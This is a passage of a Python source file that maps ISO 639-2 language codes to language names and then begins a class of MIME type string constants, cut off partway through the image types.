'ido': 'Ido',
'iii': 'Sichuan Yi; Nuosu',
'ijo': 'Ijo languages',
'iku': 'Inuktitut',
'ile': 'Interlingue; Occidental',
'ilo': 'Iloko',
'ina': 'Interlingua (International Auxiliary Language Association)',
'inc': 'Indic languages',
'ind': 'Indonesian',
'ine': 'Indo-European languages',
'inh': 'Ingush',
'ipk': 'Inupiaq',
'ira': 'Iranian languages',
'iro': 'Iroquoian languages',
'ita': 'Italian',
'jav': 'Javanese',
'jbo': 'Lojban',
'jpn': 'Japanese',
'jpr': 'Judeo-Persian',
'jrb': 'Judeo-Arabic',
'kaa': 'Kara-Kalpak',
'kab': 'Kabyle',
'kac': 'Kachin; Jingpho',
'kal': 'Kalaallisut; Greenlandic',
'kam': 'Kamba',
'kan': 'Kannada',
'kar': 'Karen languages',
'kas': 'Kashmiri',
'kat': 'Georgian',
'kau': 'Kanuri',
'kaw': 'Kawi',
'kaz': 'Kazakh',
'kbd': 'Kabardian',
'kha': 'Khasi',
'khi': 'Khoisan languages',
'khm': 'Central Khmer',
'kho': 'Khotanese; Sakan',
'kik': 'Kikuyu; Gikuyu',
'kin': 'Kinyarwanda',
'kir': 'Kirghiz; Kyrgyz',
'kmb': 'Kimbundu',
'kok': 'Konkani',
'kom': 'Komi',
'kon': 'Kongo',
'kor': 'Korean',
'kos': 'Kosraean',
'kpe': 'Kpelle',
'krc': 'Karachay-Balkar',
'krl': 'Karelian',
'kro': 'Kru languages',
'kru': 'Kurukh',
'kua': 'Kuanyama; Kwanyama',
'kum': 'Kumyk',
'kur': 'Kurdish',
'kut': 'Kutenai',
'lad': 'Ladino',
'lah': 'Lahnda',
'lam': 'Lamba',
'lao': 'Lao',
'lat': 'Latin',
'lav': 'Latvian',
'lez': 'Lezghian',
'lim': 'Limburgan; Limburger; Limburgish',
'lin': 'Lingala',
'lit': 'Lithuanian',
'lol': 'Mongo',
'loz': 'Lozi',
'ltz': 'Luxembourgish; Letzeburgesch',
'lua': 'Luba-Lulua',
'lub': 'Luba-Katanga',
'lug': 'Ganda',
'lui': 'Luiseno',
'lun': 'Lunda',
'luo': 'Luo (Kenya and Tanzania)',
'lus': 'Lushai',
'mac': 'Macedonian',
'mad': 'Madurese',
'mag': 'Magahi',
'mah': 'Marshallese',
'mai': 'Maithili',
'mak': 'Makasar',
'mal': 'Malayalam',
'man': 'Mandingo',
'mao': 'Maori',
'map': 'Austronesian languages',
'mar': 'Marathi',
'mas': 'Masai',
'may': 'Malay',
'mdf': 'Moksha',
'mdr': 'Mandar',
'men': 'Mende',
'mga': 'Irish, Middle (900-1200)',
'mic': 'Mi\'kmaq; Micmac',
'min': 'Minangkabau',
'mis': 'Uncoded languages',
'mkd': 'Macedonian',
'mkh': 'Mon-Khmer languages',
'mlg': 'Malagasy',
'mlt': 'Maltese',
'mnc': 'Manchu',
'mni': 'Manipuri',
'mno': 'Manobo languages',
'moh': 'Mohawk',
'mon': 'Mongolian',
'mos': 'Mossi',
'mri': 'Maori',
'msa': 'Malay',
'mul': 'Multiple languages',
'mun': 'Munda languages',
'mus': 'Creek',
'mwl': 'Mirandese',
'mwr': 'Marwari',
'mya': 'Burmese',
'myn': 'Mayan languages',
'myv': 'Erzya',
'nah': 'Nahuatl languages',
'nai': 'North American Indian languages',
'nap': 'Neapolitan',
'nau': 'Nauru',
'nav': 'Navajo; Navaho',
'nbl': 'Ndebele, South; South Ndebele',
'nde': 'Ndebele, North; North Ndebele',
'ndo': 'Ndonga',
'nds': 'Low German; Low Saxon; German, Low; Saxon, Low',
'nep': 'Nepali',
'new': 'Nepal Bhasa; Newari',
'nia': 'Nias',
'nic': 'Niger-Kordofanian languages',
'niu': 'Niuean',
'nld': 'Dutch; Flemish',
'nno': 'Norwegian Nynorsk; Nynorsk, Norwegian',
'nob': 'Bokmål, Norwegian; Norwegian Bokmål',
'nog': 'Nogai',
'non': 'Norse, Old',
'nor': 'Norwegian',
'nqo': 'N\'Ko',
'nso': 'Pedi; Sepedi; Northern Sotho',
'nub': 'Nubian languages',
'nwc': 'Classical Newari; Old Newari; Classical Nepal Bhasa',
'nya': 'Chichewa; Chewa; Nyanja',
'nym': 'Nyamwezi',
'nyn': 'Nyankole',
'nyo': 'Nyoro',
'nzi': 'Nzima',
'oci': 'Occitan (post 1500)',
'oji': 'Ojibwa',
'ori': 'Oriya',
'orm': 'Oromo',
'osa': 'Osage',
'oss': 'Ossetian; Ossetic',
'ota': 'Turkish, Ottoman (1500-1928)',
'oto': 'Otomian languages',
'paa': 'Papuan languages',
'pag': 'Pangasinan',
'pal': 'Pahlavi',
'pam': 'Pampanga; Kapampangan',
'pan': 'Panjabi; Punjabi',
'pap': 'Papiamento',
'pau': 'Palauan',
'peo': 'Persian, Old (ca.600-400 B.C.)',
'per': 'Persian',
'phi': 'Philippine languages',
'phn': 'Phoenician',
'pli': 'Pali',
'pol': 'Polish',
'pon': 'Pohnpeian',
'por': 'Portuguese',
'pra': 'Prakrit languages',
'pro': 'Provençal, Old (to 1500);Occitan, Old (to 1500)',
'pus': 'Pushto; Pashto',
'qaa': 'Reserved for local use',
'qab': 'Reserved for local use',
'qac': 'Reserved for local use',
'qad': 'Reserved for local use',
'qae': 'Reserved for local use',
'qaf': 'Reserved for local use',
'qag': 'Reserved for local use',
'qah': 'Reserved for local use',
'qai': 'Reserved for local use',
'qaj': 'Reserved for local use',
'qak': 'Reserved for local use',
'qal': 'Reserved for local use',
'qam': 'Reserved for local use',
'qan': 'Reserved for local use',
'qao': 'Reserved for local use',
'qap': 'Reserved for local use',
'qaq': 'Reserved for local use',
'qar': 'Reserved for local use',
'qas': 'Reserved for local use',
'qat': 'Reserved for local use',
'qau': 'Reserved for local use',
'qav': 'Reserved for local use',
'qaw': 'Reserved for local use',
'qax': 'Reserved for local use',
'qay': 'Reserved for local use',
'qaz': 'Reserved for local use',
'qba': 'Reserved for local use',
'qbb': 'Reserved for local use',
'qbc': 'Reserved for local use',
'qbd': 'Reserved for local use',
'qbe': 'Reserved for local use',
'qbf': 'Reserved for local use',
'qbg': 'Reserved for local use',
'qbh': 'Reserved for local use',
'qbi': 'Reserved for local use',
'qbj': 'Reserved for local use',
'qbk': 'Reserved for local use',
'qbl': 'Reserved for local use',
'qbm': 'Reserved for local use',
'qbn': 'Reserved for local use',
'qbo': 'Reserved for local use',
'qbp': 'Reserved for local use',
'qbq': 'Reserved for local use',
'qbr': 'Reserved for local use',
'qbs': 'Reserved for local use',
'qbt': 'Reserved for local use',
'qbu': 'Reserved for local use',
'qbv': 'Reserved for local use',
'qbw': 'Reserved for local use',
'qbx': 'Reserved for local use',
'qby': 'Reserved for local use',
'qbz': 'Reserved for local use',
'qca': 'Reserved for local use',
'qcb': 'Reserved for local use',
'qcc': 'Reserved for local use',
'qcd': 'Reserved for local use',
'qce': 'Reserved for local use',
'qcf': 'Reserved for local use',
'qcg': 'Reserved for local use',
'qch': 'Reserved for local use',
'qci': 'Reserved for local use',
'qcj': 'Reserved for local use',
'qck': 'Reserved for local use',
'qcl': 'Reserved for local use',
'qcm': 'Reserved for local use',
'qcn': 'Reserved for local use',
'qco': 'Reserved for local use',
'qcp': 'Reserved for local use',
'qcq': 'Reserved for local use',
'qcr': 'Reserved for local use',
'qcs': 'Reserved for local use',
'qct': 'Reserved for local use',
'qcu': 'Reserved for local use',
'qcv': 'Reserved for local use',
'qcw': 'Reserved for local use',
'qcx': 'Reserved for local use',
'qcy': 'Reserved for local use',
'qcz': 'Reserved for local use',
'qda': 'Reserved for local use',
'qdb': 'Reserved for local use',
'qdc': 'Reserved for local use',
'qdd': 'Reserved for local use',
'qde': 'Reserved for local use',
'qdf': 'Reserved for local use',
'qdg': 'Reserved for local use',
'qdh': 'Reserved for local use',
'qdi': 'Reserved for local use',
'qdj': 'Reserved for local use',
'qdk': 'Reserved for local use',
'qdl': 'Reserved for local use',
'qdm': 'Reserved for local use',
'qdn': 'Reserved for local use',
'qdo': 'Reserved for local use',
'qdp': 'Reserved for local use',
'qdq': 'Reserved for local use',
'qdr': 'Reserved for local use',
'qds': 'Reserved for local use',
'qdt': 'Reserved for local use',
'qdu': 'Reserved for local use',
'qdv': 'Reserved for local use',
'qdw': 'Reserved for local use',
'qdx': 'Reserved for local use',
'qdy': 'Reserved for local use',
'qdz': 'Reserved for local use',
'qea': 'Reserved for local use',
'qeb': 'Reserved for local use',
'qec': 'Reserved for local use',
'qed': 'Reserved for local use',
'qee': 'Reserved for local use',
'qef': 'Reserved for local use',
'qeg': 'Reserved for local use',
'qeh': 'Reserved for local use',
'qei': 'Reserved for local use',
'qej': 'Reserved for local use',
'qek': 'Reserved for local use',
'qel': 'Reserved for local use',
'qem': 'Reserved for local use',
'qen': 'Reserved for local use',
'qeo': 'Reserved for local use',
'qep': 'Reserved for local use',
'qeq': 'Reserved for local use',
'qer': 'Reserved for local use',
'qes': 'Reserved for local use',
'qet': 'Reserved for local use',
'qeu': 'Reserved for local use',
'qev': 'Reserved for local use',
'qew': 'Reserved for local use',
'qex': 'Reserved for local use',
'qey': 'Reserved for local use',
'qez': 'Reserved for local use',
'qfa': 'Reserved for local use',
'qfb': 'Reserved for local use',
'qfc': 'Reserved for local use',
'qfd': 'Reserved for local use',
'qfe': 'Reserved for local use',
'qff': 'Reserved for local use',
'qfg': 'Reserved for local use',
'qfh': 'Reserved for local use',
'qfi': 'Reserved for local use',
'qfj': 'Reserved for local use',
'qfk': 'Reserved for local use',
'qfl': 'Reserved for local use',
'qfm': 'Reserved for local use',
'qfn': 'Reserved for local use',
'qfo': 'Reserved for local use',
'qfp': 'Reserved for local use',
'qfq': 'Reserved for local use',
'qfr': 'Reserved for local use',
'qfs': 'Reserved for local use',
'qft': 'Reserved for local use',
'qfu': 'Reserved for local use',
'qfv': 'Reserved for local use',
'qfw': 'Reserved for local use',
'qfx': 'Reserved for local use',
'qfy': 'Reserved for local use',
'qfz': 'Reserved for local use',
'qga': 'Reserved for local use',
'qgb': 'Reserved for local use',
'qgc': 'Reserved for local use',
'qgd': 'Reserved for local use',
'qge': 'Reserved for local use',
'qgf': 'Reserved for local use',
'qgg': 'Reserved for local use',
'qgh': 'Reserved for local use',
'qgi': 'Reserved for local use',
'qgj': 'Reserved for local use',
'qgk': 'Reserved for local use',
'qgl': 'Reserved for local use',
'qgm': 'Reserved for local use',
'qgn': 'Reserved for local use',
'qgo': 'Reserved for local use',
'qgp': 'Reserved for local use',
'qgq': 'Reserved for local use',
'qgr': 'Reserved for local use',
'qgs': 'Reserved for local use',
'qgt': 'Reserved for local use',
'qgu': 'Reserved for local use',
'qgv': 'Reserved for local use',
'qgw': 'Reserved for local use',
'qgx': 'Reserved for local use',
'qgy': 'Reserved for local use',
'qgz': 'Reserved for local use',
'qha': 'Reserved for local use',
'qhb': 'Reserved for local use',
'qhc': 'Reserved for local use',
'qhd': 'Reserved for local use',
'qhe': 'Reserved for local use',
'qhf': 'Reserved for local use',
'qhg': 'Reserved for local use',
'qhh': 'Reserved for local use',
'qhi': 'Reserved for local use',
'qhj': 'Reserved for local use',
'qhk': 'Reserved for local use',
'qhl': 'Reserved for local use',
'qhm': 'Reserved for local use',
'qhn': 'Reserved for local use',
'qho': 'Reserved for local use',
'qhp': 'Reserved for local use',
'qhq': 'Reserved for local use',
'qhr': 'Reserved for local use',
'qhs': 'Reserved for local use',
'qht': 'Reserved for local use',
'qhu': 'Reserved for local use',
'qhv': 'Reserved for local use',
'qhw': 'Reserved for local use',
'qhx': 'Reserved for local use',
'qhy': 'Reserved for local use',
'qhz': 'Reserved for local use',
'qia': 'Reserved for local use',
'qib': 'Reserved for local use',
'qic': 'Reserved for local use',
'qid': 'Reserved for local use',
'qie': 'Reserved for local use',
'qif': 'Reserved for local use',
'qig': 'Reserved for local use',
'qih': 'Reserved for local use',
'qii': 'Reserved for local use',
'qij': 'Reserved for local use',
'qik': 'Reserved for local use',
'qil': 'Reserved for local use',
'qim': 'Reserved for local use',
'qin': 'Reserved for local use',
'qio': 'Reserved for local use',
'qip': 'Reserved for local use',
'qiq': 'Reserved for local use',
'qir': 'Reserved for local use',
'qis': 'Reserved for local use',
'qit': 'Reserved for local use',
'qiu': 'Reserved for local use',
'qiv': 'Reserved for local use',
'qiw': 'Reserved for local use',
'qix': 'Reserved for local use',
'qiy': 'Reserved for local use',
'qiz': 'Reserved for local use',
'qja': 'Reserved for local use',
'qjb': 'Reserved for local use',
'qjc': 'Reserved for local use',
'qjd': 'Reserved for local use',
'qje': 'Reserved for local use',
'qjf': 'Reserved for local use',
'qjg': 'Reserved for local use',
'qjh': 'Reserved for local use',
'qji': 'Reserved for local use',
'qjj': 'Reserved for local use',
'qjk': 'Reserved for local use',
'qjl': 'Reserved for local use',
'qjm': 'Reserved for local use',
'qjn': 'Reserved for local use',
'qjo': 'Reserved for local use',
'qjp': 'Reserved for local use',
'qjq': 'Reserved for local use',
'qjr': 'Reserved for local use',
'qjs': 'Reserved for local use',
'qjt': 'Reserved for local use',
'qju': 'Reserved for local use',
'qjv': 'Reserved for local use',
'qjw': 'Reserved for local use',
'qjx': 'Reserved for local use',
'qjy': 'Reserved for local use',
'qjz': 'Reserved for local use',
'qka': 'Reserved for local use',
'qkb': 'Reserved for local use',
'qkc': 'Reserved for local use',
'qkd': 'Reserved for local use',
'qke': 'Reserved for local use',
'qkf': 'Reserved for local use',
'qkg': 'Reserved for local use',
'qkh': 'Reserved for local use',
'qki': 'Reserved for local use',
'qkj': 'Reserved for local use',
'qkk': 'Reserved for local use',
'qkl': 'Reserved for local use',
'qkm': 'Reserved for local use',
'qkn': 'Reserved for local use',
'qko': 'Reserved for local use',
'qkp': 'Reserved for local use',
'qkq': 'Reserved for local use',
'qkr': 'Reserved for local use',
'qks': 'Reserved for local use',
'qkt': 'Reserved for local use',
'qku': 'Reserved for local use',
'qkv': 'Reserved for local use',
'qkw': 'Reserved for local use',
'qkx': 'Reserved for local use',
'qky': 'Reserved for local use',
'qkz': 'Reserved for local use',
'qla': 'Reserved for local use',
'qlb': 'Reserved for local use',
'qlc': 'Reserved for local use',
'qld': 'Reserved for local use',
'qle': 'Reserved for local use',
'qlf': 'Reserved for local use',
'qlg': 'Reserved for local use',
'qlh': 'Reserved for local use',
'qli': 'Reserved for local use',
'qlj': 'Reserved for local use',
'qlk': 'Reserved for local use',
'qll': 'Reserved for local use',
'qlm': 'Reserved for local use',
'qln': 'Reserved for local use',
'qlo': 'Reserved for local use',
'qlp': 'Reserved for local use',
'qlq': 'Reserved for local use',
'qlr': 'Reserved for local use',
'qls': 'Reserved for local use',
'qlt': 'Reserved for local use',
'qlu': 'Reserved for local use',
'qlv': 'Reserved for local use',
'qlw': 'Reserved for local use',
'qlx': 'Reserved for local use',
'qly': 'Reserved for local use',
'qlz': 'Reserved for local use',
'qma': 'Reserved for local use',
'qmb': 'Reserved for local use',
'qmc': 'Reserved for local use',
'qmd': 'Reserved for local use',
'qme': 'Reserved for local use',
'qmf': 'Reserved for local use',
'qmg': 'Reserved for local use',
'qmh': 'Reserved for local use',
'qmi': 'Reserved for local use',
'qmj': 'Reserved for local use',
'qmk': 'Reserved for local use',
'qml': 'Reserved for local use',
'qmm': 'Reserved for local use',
'qmn': 'Reserved for local use',
'qmo': 'Reserved for local use',
'qmp': 'Reserved for local use',
'qmq': 'Reserved for local use',
'qmr': 'Reserved for local use',
'qms': 'Reserved for local use',
'qmt': 'Reserved for local use',
'qmu': 'Reserved for local use',
'qmv': 'Reserved for local use',
'qmw': 'Reserved for local use',
'qmx': 'Reserved for local use',
'qmy': 'Reserved for local use',
'qmz': 'Reserved for local use',
'qna': 'Reserved for local use',
'qnb': 'Reserved for local use',
'qnc': 'Reserved for local use',
'qnd': 'Reserved for local use',
'qne': 'Reserved for local use',
'qnf': 'Reserved for local use',
'qng': 'Reserved for local use',
'qnh': 'Reserved for local use',
'qni': 'Reserved for local use',
'qnj': 'Reserved for local use',
'qnk': 'Reserved for local use',
'qnl': 'Reserved for local use',
'qnm': 'Reserved for local use',
'qnn': 'Reserved for local use',
'qno': 'Reserved for local use',
'qnp': 'Reserved for local use',
'qnq': 'Reserved for local use',
'qnr': 'Reserved for local use',
'qns': 'Reserved for local use',
'qnt': 'Reserved for local use',
'qnu': 'Reserved for local use',
'qnv': 'Reserved for local use',
'qnw': 'Reserved for local use',
'qnx': 'Reserved for local use',
'qny': 'Reserved for local use',
'qnz': 'Reserved for local use',
'qoa': 'Reserved for local use',
'qob': 'Reserved for local use',
'qoc': 'Reserved for local use',
'qod': 'Reserved for local use',
'qoe': 'Reserved for local use',
'qof': 'Reserved for local use',
'qog': 'Reserved for local use',
'qoh': 'Reserved for local use',
'qoi': 'Reserved for local use',
'qoj': 'Reserved for local use',
'qok': 'Reserved for local use',
'qol': 'Reserved for local use',
'qom': 'Reserved for local use',
'qon': 'Reserved for local use',
'qoo': 'Reserved for local use',
'qop': 'Reserved for local use',
'qoq': 'Reserved for local use',
'qor': 'Reserved for local use',
'qos': 'Reserved for local use',
'qot': 'Reserved for local use',
'qou': 'Reserved for local use',
'qov': 'Reserved for local use',
'qow': 'Reserved for local use',
'qox': 'Reserved for local use',
'qoy': 'Reserved for local use',
'qoz': 'Reserved for local use',
'qpa': 'Reserved for local use',
'qpb': 'Reserved for local use',
'qpc': 'Reserved for local use',
'qpd': 'Reserved for local use',
'qpe': 'Reserved for local use',
'qpf': 'Reserved for local use',
'qpg': 'Reserved for local use',
'qph': 'Reserved for local use',
'qpi': 'Reserved for local use',
'qpj': 'Reserved for local use',
'qpk': 'Reserved for local use',
'qpl': 'Reserved for local use',
'qpm': 'Reserved for local use',
'qpn': 'Reserved for local use',
'qpo': 'Reserved for local use',
'qpp': 'Reserved for local use',
'qpq': 'Reserved for local use',
'qpr': 'Reserved for local use',
'qps': 'Reserved for local use',
'qpt': 'Reserved for local use',
'qpu': 'Reserved for local use',
'qpv': 'Reserved for local use',
'qpw': 'Reserved for local use',
'qpx': 'Reserved for local use',
'qpy': 'Reserved for local use',
'qpz': 'Reserved for local use',
'qqa': 'Reserved for local use',
'qqb': 'Reserved for local use',
'qqc': 'Reserved for local use',
'qqd': 'Reserved for local use',
'qqe': 'Reserved for local use',
'qqf': 'Reserved for local use',
'qqg': 'Reserved for local use',
'qqh': 'Reserved for local use',
'qqi': 'Reserved for local use',
'qqj': 'Reserved for local use',
'qqk': 'Reserved for local use',
'qql': 'Reserved for local use',
'qqm': 'Reserved for local use',
'qqn': 'Reserved for local use',
'qqo': 'Reserved for local use',
'qqp': 'Reserved for local use',
'qqq': 'Reserved for local use',
'qqr': 'Reserved for local use',
'qqs': 'Reserved for local use',
'qqt': 'Reserved for local use',
'qqu': 'Reserved for local use',
'qqv': 'Reserved for local use',
'qqw': 'Reserved for local use',
'qqx': 'Reserved for local use',
'qqy': 'Reserved for local use',
'qqz': 'Reserved for local use',
'qra': 'Reserved for local use',
'qrb': 'Reserved for local use',
'qrc': 'Reserved for local use',
'qrd': 'Reserved for local use',
'qre': 'Reserved for local use',
'qrf': 'Reserved for local use',
'qrg': 'Reserved for local use',
'qrh': 'Reserved for local use',
'qri': 'Reserved for local use',
'qrj': 'Reserved for local use',
'qrk': 'Reserved for local use',
'qrl': 'Reserved for local use',
'qrm': 'Reserved for local use',
'qrn': 'Reserved for local use',
'qro': 'Reserved for local use',
'qrp': 'Reserved for local use',
'qrq': 'Reserved for local use',
'qrr': 'Reserved for local use',
'qrs': 'Reserved for local use',
'qrt': 'Reserved for local use',
'qru': 'Reserved for local use',
'qrv': 'Reserved for local use',
'qrw': 'Reserved for local use',
'qrx': 'Reserved for local use',
'qry': 'Reserved for local use',
'qrz': 'Reserved for local use',
'qsa': 'Reserved for local use',
'qsb': 'Reserved for local use',
'qsc': 'Reserved for local use',
'qsd': 'Reserved for local use',
'qse': 'Reserved for local use',
'qsf': 'Reserved for local use',
'qsg': 'Reserved for local use',
'qsh': 'Reserved for local use',
'qsi': 'Reserved for local use',
'qsj': 'Reserved for local use',
'qsk': 'Reserved for local use',
'qsl': 'Reserved for local use',
'qsm': 'Reserved for local use',
'qsn': 'Reserved for local use',
'qso': 'Reserved for local use',
'qsp': 'Reserved for local use',
'qsq': 'Reserved for local use',
'qsr': 'Reserved for local use',
'qss': 'Reserved for local use',
'qst': 'Reserved for local use',
'qsu': 'Reserved for local use',
'qsv': 'Reserved for local use',
'qsw': 'Reserved for local use',
'qsx': 'Reserved for local use',
'qsy': 'Reserved for local use',
'qsz': 'Reserved for local use',
'qta': 'Reserved for local use',
'qtb': 'Reserved for local use',
'qtc': 'Reserved for local use',
'qtd': 'Reserved for local use',
'qte': 'Reserved for local use',
'qtf': 'Reserved for local use',
'qtg': 'Reserved for local use',
'qth': 'Reserved for local use',
'qti': 'Reserved for local use',
'qtj': 'Reserved for local use',
'qtk': 'Reserved for local use',
'qtl': 'Reserved for local use',
'qtm': 'Reserved for local use',
'qtn': 'Reserved for local use',
'qto': 'Reserved for local use',
'qtp': 'Reserved for local use',
'qtq': 'Reserved for local use',
'qtr': 'Reserved for local use',
'qts': 'Reserved for local use',
'qtt': 'Reserved for local use',
'qtu': 'Reserved for local use',
'qtv': 'Reserved for local use',
'qtw': 'Reserved for local use',
'qtx': 'Reserved for local use',
'qty': 'Reserved for local use',
'qtz': 'Reserved for local use',
'que': 'Quechua',
'raj': 'Rajasthani',
'rap': 'Rapanui',
'rar': 'Rarotongan; Cook Islands Maori',
'roa': 'Romance languages',
'roh': 'Romansh',
'rom': 'Romany',
'rum': 'Romanian; Moldavian; Moldovan',
'ron': 'Romanian; Moldavian; Moldovan',
'run': 'Rundi',
'rup': 'Aromanian; Arumanian; Macedo-Romanian',
'rus': 'Russian',
'sad': 'Sandawe',
'sag': 'Sango',
'sah': 'Yakut',
'sai': 'South American Indian languages',
'sal': 'Salishan languages',
'sam': 'Samaritan Aramaic',
'san': 'Sanskrit',
'sas': 'Sasak',
'sat': 'Santali',
'scn': 'Sicilian',
'sco': 'Scots',
'sel': 'Selkup',
'sem': 'Semitic languages',
'sga': 'Irish, Old (to 900)',
'sgn': 'Sign Languages',
'shn': 'Shan',
'sid': 'Sidamo',
'sin': 'Sinhala; Sinhalese',
'sio': 'Siouan languages',
'sit': 'Sino-Tibetan languages',
'sla': 'Slavic languages',
'slo': 'Slovak',
'slk': 'Slovak',
'slv': 'Slovenian',
'sma': 'Southern Sami',
'sme': 'Northern Sami',
'smi': 'Sami languages',
'smj': 'Lule Sami',
'smn': 'Inari Sami',
'smo': 'Samoan',
'sms': 'Skolt Sami',
'sna': 'Shona',
'snd': 'Sindhi',
'snk': 'Soninke',
'sog': 'Sogdian',
'som': 'Somali',
'son': 'Songhai languages',
'sot': 'Sotho, Southern',
'spa': 'Spanish; Castilian',
'sqi': 'Albanian',
'srd': 'Sardinian',
'srn': 'Sranan Tongo',
'srp': 'Serbian',
'srr': 'Serer',
'ssa': 'Nilo-Saharan languages',
'ssw': 'Swati',
'suk': 'Sukuma',
'sun': 'Sundanese',
'sus': 'Susu',
'sux': 'Sumerian',
'swa': 'Swahili',
'swe': 'Swedish',
'syc': 'Classical Syriac',
'syr': 'Syriac',
'tah': 'Tahitian',
'tai': 'Tai languages',
'tam': 'Tamil',
'tat': 'Tatar',
'tel': 'Telugu',
'tem': 'Timne',
'ter': 'Tereno',
'tet': 'Tetum',
'tgk': 'Tajik',
'tgl': 'Tagalog',
'tha': 'Thai',
'tib': 'Tibetan',
'tig': 'Tigre',
'tir': 'Tigrinya',
'tiv': 'Tiv',
'tkl': 'Tokelau',
'tlh': 'Klingon; tlhIngan-Hol',
'tli': 'Tlingit',
'tmh': 'Tamashek',
'tog': 'Tonga (Nyasa)',
'ton': 'Tonga (Tonga Islands)',
'tpi': 'Tok Pisin',
'tsi': 'Tsimshian',
'tsn': 'Tswana',
'tso': 'Tsonga',
'tuk': 'Turkmen',
'tum': 'Tumbuka',
'tup': 'Tupi languages',
'tur': 'Turkish',
'tut': 'Altaic languages',
'tvl': 'Tuvalu',
'twi': 'Twi',
'tyv': 'Tuvinian',
'udm': 'Udmurt',
'uga': 'Ugaritic',
'uig': 'Uighur; Uyghur',
'ukr': 'Ukrainian',
'umb': 'Umbundu',
'und': 'Undetermined',
'urd': 'Urdu',
'uzb': 'Uzbek',
'vai': 'Vai',
'ven': 'Venda',
'vie': 'Vietnamese',
'vol': 'Volapük',
'vot': 'Votic',
'wak': 'Wakashan languages',
'wal': 'Wolaitta; Wolaytta',
'war': 'Waray',
'was': 'Washo',
'wel': 'Welsh',
'wen': 'Sorbian languages',
'wln': 'Walloon',
'wol': 'Wolof',
'xal': 'Kalmyk; Oirat',
'xho': 'Xhosa',
'yao': 'Yao',
'yap': 'Yapese',
'yid': 'Yiddish',
'yor': 'Yoruba',
'ypk': 'Yupik languages',
'zap': 'Zapotec',
'zbl': 'Blissymbols; Blissymbolics; Bliss',
'zen': 'Zenaga',
'zgh': 'Standard Moroccan Tamazight',
'zha': 'Zhuang; Chuang',
'zho': 'Chinese',
'znd': 'Zande languages',
'zul': 'Zulu',
'zun': 'Zuni',
'zxx': 'No linguistic content; Not applicable',
'zza': 'Zaza; Dimili; Dimli; Kirdki; Kirmanjki; Zazaki',
}
class MIME_TYPES(object):
APPLICATION_ACAD = 'application/acad'
APPLICATION_APPLEFILE = 'application/applefile'
APPLICATION_ASTOUND = 'application/astound'
APPLICATION_DSPTYPE = 'application/dsptype'
APPLICATION_DXF = 'application/dxf'
APPLICATION_FUTURESPLASH = 'application/futuresplash'
APPLICATION_GZIP = 'application/gzip'
APPLICATION_JAVASCRIPT = 'application/javascript'
APPLICATION_JSON = 'application/json'
APPLICATION_LISTENUP = 'application/listenup'
APPLICATION_MAC_BINHEX_40 = 'application/mac-binhex40'
APPLICATION_MBEDLET = 'application/mbedlet'
APPLICATION_MIF = 'application/mif'
APPLICATION_MSEXCEL = 'application/msexcel'
APPLICATION_MSHELP = 'application/mshelp'
APPLICATION_MSPOWETPOINT = 'application/mspowerpoint'
APPLICATION_MSWORD = 'application/msword'
APPLICATION_OCTET_STREAM = 'application/octet-stream'
APPLICATION_ODA = 'application/oda'
APPLICATION_PDF = 'application/pdf'
APPLICATION_POSTSCRIPT = 'application/postscript'
APPLICATION_RTC = 'application/rtc'
APPLICATION_RTF = 'application/rtf'
APPLICATION_STUDIOM = 'application/studiom'
APPLICATION_TOOLBOOK = 'application/toolbook'
APPLICATION_VOCALTEC_MEDIA_DESC = 'application/vocaltec-media-desc'
APPLICATION_VOCALTEC_MEDIA_FILE = 'application/vocaltec-media-file'
APPLICATION_VND_OPENXMLFORMATS_OFFICEDOCUMENT_SPREADSHEETML_SHEET = \
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
APPLICATION_VND_OPENXMLFORMATS_OFFICEDOCUMENT_WORDPROCESSINGML_DOCUMENT = \
'application/vnd.openxmlformats-officedocument.wordprocessingml.document'
APPLICATION_XHTML_XML = 'application/xhtml+xml'
APPLICATION_XML = 'application/xml'
APPLICATION_X_BCPIO = 'application/x-bcpio'
APPLICATION_X_COMPRESS = 'application/x-compress'
APPLICATION_X_CPIO = 'application/x-cpio'
APPLICATION_X_CSH = 'application/x-csh'
APPLICATION_X_DIRECTOR = 'application/x-director'
APPLICATION_X_DVI = 'application/x-dvi'
APPLICATION_X_ENVOY = 'application/x-envoy'
APPLICATION_X_GTAR = 'application/x-gtar'
APPLICATION_X_HDF = 'application/x-hdf'
APPLICATION_X_HTTPD_PHP = 'application/x-httpd-php'
APPLICATION_X_LATEX = 'application/x-latex'
APPLICATION_X_MACBINARY = 'application/x-macbinary'
APPLICATION_X_MIF = 'application/x-mif'
APPLICATION_X_NETCDF = 'application/x-netcdf'
APPLICATION_X_NSCHAT = 'application/x-nschat'
APPLICATION_X_SH = 'application/x-sh'
APPLICATION_X_SHAR = 'application/x-shar'
APPLICATION_X_SHOCKWAVE_FLASH = 'application/x-shockwave-flash'
APPLICATION_X_SPRITE = 'application/x-sprite'
APPLICATION_X_STUFFIT = 'application/x-stuffit'
APPLICATION_X_SUPERCARD = 'application/x-supercard'
APPLICATION_X_SV4CPIO = 'application/x-sv4cpio'
APPLICATION_X_SV4CRC = 'application/x-sv4crc'
APPLICATION_X_TAR = 'application/x-tar'
APPLICATION_X_TCL = 'application/x-tcl'
APPLICATION_X_TEX = 'application/x-tex'
APPLICATION_X_TEXINFO = 'application/x-texinfo'
APPLICATION_X_TROFF = 'application/x-troff'
APPLICATION_X_TROFF_MAN = 'application/x-troff-man'
APPLICATION_X_TROFF_ME = 'application/x-troff-me'
APPLICATION_X_TROFF_MS = 'application/x-troff-ms'
APPLICATION_X_USTAR = 'application/x-ustar'
APPLICATION_X_WAIS_SOURCE = 'application/x-wais-source'
APPLICATION_X_WWW_FORM_URLENCODED = 'application/x-www-form-urlencoded'
APPLICATION_ZIP = 'application/zip'
AUDIO_BASIC = 'audio/basic'
AUDIO_ECHOSPEECH = 'audio/echospeech'
AUDIO_TSPLAYER = 'audio/tsplayer'
AUDIO_VOXWARE = 'audio/voxware'
AUDIO_X_AIFF = 'audio/x-aiff'
AUDIO_X_DSPEEH = 'audio/x-dspeeh'
AUDIO_X_MIDI = 'audio/x-midi'
AUDIO_X_MPEG = 'audio/x-mpeg'
AUDIO_X_PN_REALAUDIO = 'audio/x-pn-realaudio'
AUDIO_X_PN_REALAUDIO_PLUGIN = 'audio/x-pn-realaudio-plugin'
AUDIO_X_QT_STREAM = 'audio/x-qt-stream'
AUDIO_X_WAV = 'audio/x-wav'
DRAWING_X_DWF = 'drawing/x-dwf'
IMAGE_BMP = 'image/bmp'
IMAGE_CIS_COD = 'image/cis-cod'
IMAGE_CMU_RASTER = 'image/cmu-raster'
IMAGE_FIF = 'image/fif'
